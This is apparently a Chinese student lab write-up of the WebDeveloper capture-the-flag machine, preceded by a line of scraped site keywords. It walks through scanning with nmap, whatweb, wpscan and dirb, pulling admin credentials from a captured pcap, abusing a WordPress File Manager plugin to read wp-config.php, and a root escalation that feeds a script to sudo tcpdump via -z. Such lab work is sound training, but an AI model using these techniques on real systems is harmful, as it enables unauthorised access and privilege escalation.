门户网站用什么后台系统好,全网线报 实时更新,html网站建设中,汕头集团做网站方案配置WebDeveloper的时候遇到一个错误 导入失败#xff0c;因为 E:…ovf 未通过 OVF 规范一致性或虚拟硬件合规性检查。 请单击“重试”放松 OVF 规范与虚拟硬件合规性检查#xff0c;并重新尝试导入#xff1b; 或单击“取消”以取消导入。如果重新尝试导入#xff0c;可能…配置WebDeveloper的时候遇到一个错误 导入失败因为 E:…ovf 未通过 OVF 规范一致性或虚拟硬件合规性检查。 请单击“重试”放松 OVF 规范与虚拟硬件合规性检查并重新尝试导入 或单击“取消”以取消导入。如果重新尝试导入可能无法使用 VMware Workstation 中的虚拟机
原因 这是因为OVF 版本不同导致的VMware Workstation内置的ofvtool工具只支持OVF version 1.0导致无法兼容 去更新一下
1、发现目标 (netdiscover)找到WebDeveloper的IP地址。截图。 看到MAC地址 000c29 说明是虚拟机这里我开了两台
2、:利用NMAP扫描目标主机发现目标主机端口开放、服务情况截图并说明目标提供的服务有哪些利用第一次实验知识点 开启ssh服务 http服务 SSH 服务是一种网络安全协议通过加密和认证机制实现安全的访问和文件传输等业务。它是用于远程登录、文件传输、端口转发等网络管理任务的常用工具
3、若目标主机提供了HTTP服务尝试利用浏览器访问目标网站。截图。是否有可用信息 4、利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么
whatweb http://服务器ip/index.php/2018/10/30/hello-world/5、网络搜索wpscan简要说明其功能
wpscan -h可以查看各种参数以及定义 WordPress网站是使用WordPress内容管理系统CMS搭建的网站 Wpscan是专门检查Wordpress网站漏洞的工具它可以全面检查wp网站的漏洞有助于我们增加网站安全防护。该扫描器可以实现获取Wordpress站点用户名获取安装的所有插件、主题以及存在漏洞的插件、主题并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码 WPScan 是一个开源的 WordPress 安全扫描器可以用于扫描 WordPress 网站的安全漏洞。它使用黑盒测试方法可以从外部对目标网站进行扫描而无需登录到网站
6、使用 Dirb 爆破网站目录。Dirb 是一个专门用于爆破目录的工具在 Kali 中默认已经安装类似工具还有国外的patatordirsearchDirBuster 国内的御剑截图。找到一个似乎和网络流量有关的目录路径。
服务器ip/ipdata
7、浏览器访问该目录路径发现一个cap文件。截图。 8、利用Wireshark分析该数据包分析TCP数据流。找到什么有用的信息截图。
用http.request.methodPOST过滤出POST发送的数据一般登录都是以POST方法传递数据 看到账户名称 还有对应的密码
9、利用上一步得到的信息进入网站后台。截图。 网站管理员账号与操作系统账号是不同概念 这里因为我做完了再复现的笔记
10、利用该CMS存在的插件Plugin漏洞。
方法一 搞这个插件的时候这里出现了问题先放在这里
方法二 下载一个这个脚本要去kali的浏览器下载在Windows的浏览器下载没有安装安全软件自带的都能杀了这个文件 这里也有问题源代码变了 方法三 利用文件管理插件File manager漏洞 安装该插件直接可以浏览wp-config.php
11、SSH登录服务器
ssh webdeveloper服务器IP 1、尝试查看/root/flag.txt 2、使用tcpdump执行任意命令当tcpdump捕获到数据包后会执行指定的命令。 查看当前身份可执行的命令。
发现可以root权限执行tcpdump命令
touch /tmp/exploit //创建攻击文件
echo cat /root/flag.txt /tmp/exploit //写入shellcode
chmod x /tmp/exploit //赋予可执行文件
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root//利用tcpdump执行任意命令tcpdump命令详解 -i eth0 从指定网卡捕获数据包 -w /dev/null 将捕获到的数据包输出到空设备不输出数据包结果 -z [command] 运行指定的命令 -Z [user] 指定用户执行命令 -G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储 -W [num] 指定抓包数量